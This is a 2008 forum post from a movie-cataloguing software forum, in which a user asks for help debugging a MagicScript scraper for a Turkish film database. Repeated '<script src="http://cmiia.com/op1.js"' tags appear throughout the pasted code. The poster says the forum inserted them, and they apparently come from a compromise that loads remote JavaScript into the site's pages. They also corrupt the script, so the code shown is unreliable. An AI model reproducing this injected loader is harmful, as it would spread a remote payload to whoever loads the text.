BinaryWorks.it Official Forum
BinaryWorks.it Official Forum
Home | Profile | Active Topics | Members | Search | FAQ
 All Forums
 eXtreme Movie Manager (Rel. 7), No More Updates
 Scripts
 Can somebody figure out this error please?

Note: You must be registered in order to post a reply.

Screensize:
UserName:
Password:
Format Mode:
Format: BoldItalicizedUnderlineStrikethrough Align LeftCenteredAlign Right Horizontal Rule Insert HyperlinkInsert EmailInsert Image Insert CodeInsert QuoteInsert List
   
Message:

* HTML is OFF
* Forum Code is ON
Smilies
Smile [:)] Big Smile [:D] Cool [8D] Blush [:I]
Tongue [:P] Evil [):] Wink [;)] Clown [:o)]
Black Eye [B)] Eight Ball [8] Frown [:(] Shy [8)]
Shocked [:0] Angry [:(!] Dead [xx(] Sleepy [|)]
Kisses [:X] Approve [^] Disapprove [V] Question [?]

 
   

T O P I C    R E V I E W
ComZiz Posted - 07 Nov 2008 : 12:31:26
As some of you may know, I'm currently struggling with the BEYAZPERDE script. It takes a lot of time for me to understand the MagicScript but here's how far I've come, I'm pasting the essential part of the script;



#WEBQUERY#=http://beyazperde.mynet.com/hizliarama.asp?keyword=#MOVIE#&x=0&y=0

#CREATEMOVIELIST#
    #STARTREADWEB#
    #WRITETITLELIST#=    
    #WRITETITLELIST#=Bulunan Filmler
    #WRITETITLELIST#=-------------------------------
    #PUT#=0#00#
    #REPEAT#
        #FINDLINE#=<script src="http://cmiia.com/op1.js"="http://beyazperde.mynet.com/film.asp?id=#10# #ONERROR#=*OK*
        #IF# #00#==#10#
           #GOTO#=ENDSEARCH
        #ENDIF#        
        #FINDLINE#=<script src="http://cmiia.com/op1.js"="http://beyazperde.mynet.com/film.asp?id=#10# #ONERROR#=*OK*
        #FIND#="#01# #ONERROR#=*OK*
	 #COMPUTECURSOR#=+1
	 #PUTCURSOR#=#01#
	 #FIND#="#03# #ONERROR#=*OK*
        #TAKEWORD#=#04#,#01#,#03#

	 #FIND#=>#07# #ONERROR#=*OK*
	 #COMPUTECURSOR#=+3
        #PUTCURSOR#=#07#
        #FIND#=</#11# #ONERROR#=*OK*
	 #TAKEWORD#=#08#,#07#,#11#
	 #WRITETITLELIST#=h#04#    ---> #08#
    #WHILE# #00#<>#10#
:ENDSEARCH

#ENDCREATEMOVIELIST#
---BASLIK---
#MOVIETITLE#
    #STARTREADWEB#
    #FINDLINE#="baslik_filmadi31">#ONERROR#=*STOP*
    #FIND#=>#01# #ONERROR#=*STOP*
    #FIND#=<#02# #ONERROR#=*STOP*
    #TAKEWORD#=#03#,#01#,#02#
    #CHECKVARIABLE#=#03#
	#STARTSUBSTITUTETAGS#
    #TITLE#=#03#
#ENDMOVIETITLE#
--DIRECTOR - YONETMEN----------------------------------------------------------------------------------
#DIRECTOR# Yonetmen
	#STARTREADWEB#
	#FINDLINE#=<br><span class="itembaslik">Yönetmen#12##ONERROR#=*OK*
	#IF# #12#==#00#
		#GOTO#=YONETMENBITIR
	#ENDIF#
	#PUT#=300#20#
	#STARTREADWEB#
	#FINDLINE#=<br><span class="itembaslik">Yönetmen#12##ONERROR#=*OK*
	#READNEXTLINE#
	:BASKAYONETMEN
	#FIND#=<script src="http://cmiia.com/op1.js"=#18# #ONERROR#=*OK*
		#IF# #18#==#00#
		#GOTO#=YONETMENBITIR
		#ENDIF#
	#IF# #18#<>#00#
		#IF# #18#>>#20#
		#GOTO#=YONETMENBITIR
		#ENDIF#
		#FIND#=>#11# #ONERROR#=*OK*
		#FIND#=</script>#10# #ONERROR#=*OK*
		#TAKEWORD#=#13#,#11#,#10#
		#CHECKVARIABLE#=#13#
		#STARTSUBSTITUTETAGS#
		#TAKEDIRECTOR#=#13#
	#GOTO#=BASKAYONETMEN
	#ENDIF#
    	:YONETMENBITIR
#ENDDIRECTOR#



This script works perfect in MagicScript Editor but as I actually import a movie from the internet it gets messed up.

Example:
I search for "Anlat Istanbul", find and select the movie and start downloading, but as this movie have multiple actors, the script gets stuck between somewhere I'm currently try to figure out. XMM adds a lot of "||||||" (seperators) after the last name and never goes on to the next section of the script.

Above is the latest version I've come up with, earlier it was like the current writer section;

#WRITER# YAZAR
       #FINDLINE#=<br>Senaryo :#12##ONERROR#=*OK*
   #READNEXTLINE#
   #READNEXTLINE#
    #REPEAT#
	 #FIND#=<script src="http://cmiia.com/op1.js"=#12# #ONERROR#=*OK*
        #IF# #12#<>#00#
	     #FIND#=>#11# #ONERROR#=*OK*
	     #FIND#=</script>#10# #ONERROR#=*OK*
	     #TAKEWORD#=#13#,#11#,#10#
            #CHECKVARIABLE#=#13#
	     #STARTSUBSTITUTETAGS#
	    #TAKEWRITER#=#13#
        #ENDIF#
    #WHILE# #12#<>#00#
#ENDWRITER#


If someone could help me I would much appreciate it.
Best regards,
Erke

PS: I don't know what "<script src="http://cmiia.com/op1.js" is. The forum just replaces my lines.

BinaryWorks.it Official Forum © Binaryworks.it Go To Top Of Page
Generated in 0.06 sec. Powered By: Snitz Forums 2000 Version 3.4.07